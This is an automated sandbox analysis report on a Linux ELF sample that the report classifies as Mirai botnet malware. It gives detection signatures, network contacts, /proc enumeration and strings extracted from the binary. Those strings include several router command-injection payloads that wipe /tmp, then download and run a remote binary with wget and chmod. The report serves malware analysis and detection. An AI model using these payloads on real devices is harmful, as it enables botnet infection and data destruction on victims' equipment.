Edit tour

Linux Analysis Report
Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf

Overview

General Information

Sample name:Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
Analysis ID:1547940
MD5:cd3d4b9c643e5b473fb4d88ed05f0716
SHA1:64ee7a97418583d759eaea8000890cc3bae1b5f4
SHA256:0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Contains symbols with names commonly found in malware
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Reads the 'hosts' file potentially containing internal network hosts
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1547940
Start date and time:2024-11-03 13:50:31 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
Detection:MAL
Classification:mal76.troj.linELF@0/1@1/0
  • Connection to analysis system has been lost, crash info: Unknown
  • VT rate limit hit for: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
Command:/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf
PID:5493
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfReversingLabs: Detection: 47%
        Source: global trafficHTTP traffic detected: GET /.shell HTTP/1.1Host: 216.126.231.240Connection: close
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5496)Reads hosts file: /etc/hostsJump to behavior
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /.shell HTTP/1.1Host: 216.126.231.240Connection: close
        Source: global trafficDNS traffic detected: DNS query: conn.masjesu.zip
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfString found in binary or memory: http://purenetworks.com/HNAP1/
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: unknownNetwork traffic detected: HTTP traffic on port 46698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46698

        System Summary

        barindex
        Source: ELF static info symbol of initial sampleName: ATTACKRUNNING
        Source: ELF static info symbol of initial sampleName: LastAttackTime
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner10_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner11_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner12_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner13_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner14_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner2_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner3_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner4_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner5_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner6_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner7_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner8_pid
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: scanner9_pid
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s -l /tmp/huawei -r /spim;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s -l /tmp/huawei -r /spim;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /UD/act?1 HTTP/1.1
        Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
        Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s/l7vmra;sh${IFS}/tmp/l7vmra&>r&&tar${IFS}/string.js HTTP/1.0
        Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s/spim;${IFS}sh${IFS}/var/tmp/spim
        Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
        Source: Initial samplePotential command found: GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F%s%2Fbins.sh%3B%20chmod%20777%20bins.sh%3B%20.%2Fbins.sh) HTTP/1.1
        Source: Initial samplePotential command found: GET /.shell HTTP/1.1
        Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s/spim;${IFS}sh${IFS}/var/tmp/spimGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s/l7vmra;chmod+777+l7vmra;/tmp/l7vmraGET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F%s%2Fbins.sh%3B%20chmod%20777%20bins.sh%3B%20.%2Fbins.sh) HTTP/1.1
        Source: classification engineClassification label: mal76.troj.linELF@0/1@1/0
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/string/sparc/memchr.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/string/sparc/memcpy.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/string/sparc/memset.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/string/sparc/strcat.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/string/sparc/strchr.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/string/sparc/strcmp.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/string/sparc/strcpy.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/string/sparc/strlen.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/sysdeps/linux/sparc/crt1.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/sysdeps/linux/sparc/crti.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/sysdeps/linux/sparc/crtn.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/sysdeps/linux/sparc/fork.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/sysdeps/linux/sparc/rem.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/sysdeps/linux/sparc/umul.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/sysdeps/linux/sparc/urem.S
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfELF static info symbol of initial sample: libc/sysdeps/linux/sparc/vfork.S
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3760/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/1583/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/2672/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/110/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3759/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/111/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/112/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/113/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/234/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/1577/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/114/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/235/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/115/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/116/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/117/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/118/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/119/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3757/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/10/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/917/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3758/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/11/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/12/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/13/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/14/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/15/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/16/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/17/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/18/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/19/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/1593/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/240/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/120/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3094/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/121/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/242/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3406/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/1/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/122/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/243/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/2/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/123/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/244/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/1589/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/124/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/245/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/1588/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/125/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/4/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/246/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3402/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/126/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/5/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/247/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/127/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/6/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/248/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/128/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/7/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/249/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/8/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/129/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/800/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/9/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/801/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/803/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/20/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/806/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/21/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/807/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/928/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/22/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/23/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/24/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/25/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/26/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/27/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/28/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/29/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3420/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/490/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/250/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/130/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/251/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/131/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/252/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/132/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/253/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/254/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/255/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/135/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/256/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/1599/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/257/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/378/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/258/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/3412/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/259/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/30/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/35/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/1371/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/260/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/261/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5499)File opened: /proc/262/cmdlineJump to behavior
        Source: /tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf (PID: 5493)Queries kernel information via 'uname': Jump to behavior
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, 5493.1.0000560b7e753000.0000560b7e7b8000.rw-.sdmp, Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, 5495.1.0000560b7e753000.0000560b7e7b8000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, 5493.1.0000560b7e753000.0000560b7e7b8000.rw-.sdmp, Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, 5495.1.0000560b7e753000.0000560b7e7b8000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/sparc
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, 5493.1.00007ffc512be000.00007ffc512df000.rw-.sdmp, Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, 5495.1.00007ffc512be000.00007ffc512df000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
        Source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, 5493.1.00007ffc512be000.00007ffc512df000.rw-.sdmp, Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, 5495.1.00007ffc512be000.00007ffc512df000.rw-.sdmpBinary or memory string: Ox86_64/usr/bin/qemu-sparc/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, type: SAMPLE

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Dqq4ar4kvW6h1hNPHQtQWcKevZo4vyLFys.elf, type: SAMPLE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Command and Scripting Interpreter
        Path InterceptionPath Interception1
        Masquerading
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
